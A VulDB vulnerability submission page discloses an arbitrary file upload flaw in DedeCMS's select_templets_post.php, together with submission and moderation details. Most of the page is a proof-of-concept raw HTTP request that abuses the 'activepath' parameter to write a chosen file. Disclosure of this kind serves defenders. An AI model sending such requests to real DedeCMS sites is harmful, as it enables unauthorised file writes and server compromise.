Submeter #206433: dedeCMS has a logic flaw that causes arbitrary file uploads informação

Título dedeCMS has a logic flaw that causes arbitrary file uploads
DescriçãoPOC POST /include/dialog/select_templets_post.php HTTP/1.1 Host: dede.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------59698619541674634093520637807 Content-Length: 821 Origin: http://dede.com Connection: close Referer: http://dede.com/include/dialog/select_templets.php?&activepath=%2Ftemplets%2Fplus&f=form1.templet Cookie: PHPSESSID=7aojpo4e5kuvg8g5jokphrds52; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=1b47eac98453ada5; DedeLoginTime=1693981005; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=3cfe4db1e215919a; _csrf_name_35a8e786=0925065ac6fc01dd9093ec5507d4c2b6; _csrf_name_35a8e7861BH21ANI1AGD297L1FF21LN02BGE1DNG=65437f2a75024ae2 Upgrade-Insecure-Requests: 1 -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="activepath" /member -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="f" form1.templet -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="job" upload -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="uploadfile"; filename="ez_pz.py.txt" Content-Type: text/x-python 1 -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="filename" 123.txt -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="sb1" 确定 -----------------------------59698619541674634093520637807--
Fonte⚠️ https://github.com/bayuncao/DEDEcms
Utilizador
 bayuncao (UID 50143)
Submissão11/09/2023 06h45 (há 3 anos)
Moderação16/09/2023 09h52 (5 days later)
EstadoAceite
Entrada VulDB239863 [DedeCMS até 5.7.100 select_templets_post.php activepath Elevação de Privilégios]
Pontos20

VoltarVisão GeralPróximo

Want to know what is going to be exploited?

We predict KEV entries!